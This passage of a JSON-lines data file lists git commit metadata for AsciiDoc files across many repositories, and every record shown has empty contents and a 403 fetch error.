2017-02-17-First-Hubpress-Blog.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"707321d071df213bda93ec1f72cfc9f71be8c7d1","subject":"RHDEVDOCS-3304 Document default pipelines SA","message":"RHDEVDOCS-3304 Document default pipelines SA\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/3304-delete-later.adoc","new_file":"modules\/3304-delete-later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b4f3e04e462c690a9f7591bbe0058473f63103d","subject":"Update 2017-03-10-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc030c10ab04f001ee9c2b2c0f59de7993434dba","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d594b2228c4744506ddcb433bae14d5cc219814","subject":"Update 2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","message":"Update 2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","new_file":"_posts\/2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be56dcd5adb960ae46f8b8ce7b7180afeb0f251f","subject":"CAMEL-14738 - Added pages for website after regen","message":"CAMEL-14738 - Added pages for website after regen\n","repos":"nikhilvibhav\/camel,alvinkwekel\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,adessaigne\/camel,zregvart\/camel,DariusX\/camel,cunningt\/camel,tdiesler\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,mcollovati\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,pax95\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,zregvart\/camel,pax95\/camel,tadayosi\/camel,ullgren\/camel,apache\/camel,zregvart\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,alvinkwekel\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,ullgren\/camel,gnodet\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,alvinkwekel\/camel,cunningt\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tdiesler\/camel,gnodet\/camel,pax95\/camel,nicolaferraro\/camel,apache\/camel,tdiesler\/camel,DariusX\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,alvinkwekel\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,DariusX\/camel,gnodet\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,mcollovati\/camel,mcollovati\/camel,mcollovati\/camel,tadayosi\/camel,gnodet\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/platform-http-vertx.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/platform-http-vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5fad35f3430c758e8fc2499ff0193045d6cff120","subject":"Document preview features that are available","message":"Document preview features that are available\n\nThis page lists the features that are currently enabled by turning on `experimentalFeatures`.\r\nIt does not yet provide any details on how these features should be enabled.","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,lsmaira\/gradle,lsmaira\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,lsmaira\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,lsmaira\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,lsmaira\/gradle","old_file":"subprojects\/dependency-management\/preview-features.adoc","new_file":"subprojects\/dependency-management\/preview-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57300181612aa599c0d55f84497570823aee10bf","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/03\/04\/deref.adoc","new_file":"content\/news\/2022\/03\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2fc36ec637866db0bb6271c911907a32183c8a5d","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edf0b797286dd5cce7d94b3a663c9cf842e867c7","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a93754ab042e8fbfd5b64139cab8be0a521ee3c","subject":"y2b create post More Giveaways! + iPod Touch Winner","message":"y2b create post More Giveaways! + iPod Touch Winner","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-24-More-Giveaways--iPod-Touch-Winner.adoc","new_file":"_posts\/2011-08-24-More-Giveaways--iPod-Touch-Winner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1db525487bc633f736817968af06366cd195d6e","subject":"Update 2015-11-17-Expresiones-negativas-en-comandos.adoc","message":"Update 2015-11-17-Expresiones-negativas-en-comandos.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-17-Expresiones-negativas-en-comandos.adoc","new_file":"_posts\/2015-11-17-Expresiones-negativas-en-comandos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d20f3306f5348f70051fb9acba5c2fbfca7679d","subject":"Create 2014-08-29-forge-2.8.1.final.asciidoc","message":"Create 2014-08-29-forge-2.8.1.final.asciidoc","repos":"luiz158\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,forge\/docs","old_file":"news\/2014-08-29-forge-2.8.1.final.asciidoc","new_file":"news\/2014-08-29-forge-2.8.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a6b3ae3b979c9cdecc33d6090ea4faf5fae04f1b","subject":"Added Forge 3.0.0.Beta2 announcement","message":"Added Forge 3.0.0.Beta2 announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-01-18-forge-3.0.0.beta2.asciidoc","new_file":"news\/2016-01-18-forge-3.0.0.beta2.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4b71c7e2f955f30f96e986ff8564f81c7fb7307e","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a099e85e20f0b104d092b03168c2bdf5f892aeb8","subject":"docs: fix Spark example to provide partitioning","message":"docs: fix Spark example to provide partitioning\n\nChange-Id: I23f720d8502bbb01c544aa8f2b0978ba0f147c7d\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6085\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b3c8c608206d0b9d023f7a0044b68509284d423","subject":"update endpoint doc","message":"update endpoint doc\n","repos":"Kronos-Integration\/kronos-step","old_file":"doc\/endpoint-interface.adoc","new_file":"doc\/endpoint-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-step.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d2a76fb502360974acaff387d1ad02180412a526","subject":"Working progress on tpenqueue.adoc doc","message":"Working progress on tpenqueue.adoc doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpenqueue.adoc","new_file":"doc\/api\/xatmi\/tpenqueue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c0683e377a9e570539ce02f99509b9fba9ebfafe","subject":"Added a description of the 'options' field of the reporter structure and exemplifying with the TextReporterOptions","message":"Added a description of the 'options' field of the reporter structure and exemplifying with the TextReporterOptions\n","repos":"cgreen-devs\/cgreen,thoni56\/cgreen,matthargett\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,matthargett\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,matthargett\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,matthargett\/cgreen,matthargett\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"59d67782a9bdb102565a42434f888753c8ea654f","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"905797371914fcee9a15a6cbafb33a130b12115e","subject":"Add a redirect page for the old documentations","message":"Add a redirect page for the old documentations\n","repos":"robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/cpp_plugins.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/cpp_plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21c541a39b55430e16415966ac28e6acf57991cf","subject":"Update 2017-02-12-test-post2.adoc","message":"Update 2017-02-12-test-post2.adoc","repos":"osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io","old_file":"_posts\/2017-02-12-test-post2.adoc","new_file":"_posts\/2017-02-12-test-post2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osada9000\/osada9000.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b3e0df8ed42d006f53888e0d30f87286f20c3bb","subject":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","message":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"149f55136fee93f625ee8ba65ffb3ddfd971d276","subject":"Update 2016-04-18-First-Blog.adoc","message":"Update 2016-04-18-First-Blog.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2016-04-18-First-Blog.adoc","new_file":"_posts\/2016-04-18-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7f02278d8c1f892f5362f403ce627b5701595d4","subject":"Update 2016-08-18-2016-08-17.adoc","message":"Update 2016-08-18-2016-08-17.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-18-2016-08-17.adoc","new_file":"_posts\/2016-08-18-2016-08-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6b878e9ae815fd2ea377b4597314cd16e6a9f26","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0645979a10f2e47a9ba915864afed5db366072a","subject":"Update 2019-08-24-Code-snips.adoc","message":"Update 2019-08-24-Code-snips.adoc","repos":"ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io","old_file":"_posts\/2019-08-24-Code-snips.adoc","new_file":"_posts\/2019-08-24-Code-snips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImpossibleBlog\/impossibleblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2ba6f49663f22a219f5b247bd9686bee9ef30c4","subject":"create post DON'T Buy The Google Pixel Buds","message":"create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-DONT-Buy-The-Google-Pixel-Buds.adoc","new_file":"_posts\/2018-02-26-DONT-Buy-The-Google-Pixel-Buds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b6782ff20314a17f532c63f015ac56858188d56","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a496a1df0ac545afc4513340bbb82568fbebcc","subject":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","message":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8658909c2a60b4afc39382333d94b86c71e7cd1b","subject":"Update 2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","message":"Update 2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","repos":"arshakian\/arshakian.github.io,arshakian\/arshakian.github.io,arshakian\/arshakian.github.io","old_file":"_posts\/2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","new_file":"_posts\/2016-12-21-Perfect-Salesforce-Developer-Interview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arshakian\/arshakian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"582f44885b73048e9fce35b113cbf2382288f63c","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6b628a621c8e1a845974493387bc2e87a47e8e2","subject":"Update 2015-01-31-Hello-World.adoc","message":"Update 2015-01-31-Hello-World.adoc","repos":"jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io,jaslyn94\/jaslyn94.github.io","old_file":"_posts\/2015-01-31-Hello-World.adoc","new_file":"_posts\/2015-01-31-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaslyn94\/jaslyn94.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b383bfd29f4399393f93c3184c1066c96900d6e","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9297609be9f8f7472698beb0d3618a5d8ba38e7d","subject":"Update MicroServiceCasualTalk.adoc","message":"Update MicroServiceCasualTalk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/MicroServiceCasualTalk.adoc","new_file":"_posts\/MicroServiceCasualTalk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3e0bbb38e90ddcb5e1a67657a98a69218e6f98","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a643956af1e8ed972f8a5f8d7cf2e50dbe2bd838","subject":"Update 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","message":"Update 2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_file":"_posts\/2015-04-08-jboss-eap-62-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced70da4a6d2fa058b991ef61882bccc51fdfb24","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22f906687add187f1ae8b0104d2aacf3fcc13371","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3229d1f6c89367b706a0d34d6e091c051f9db88c","subject":"Add a blurb that the local server name needs to be unique.","message":"Add a blurb that the local server name needs to be 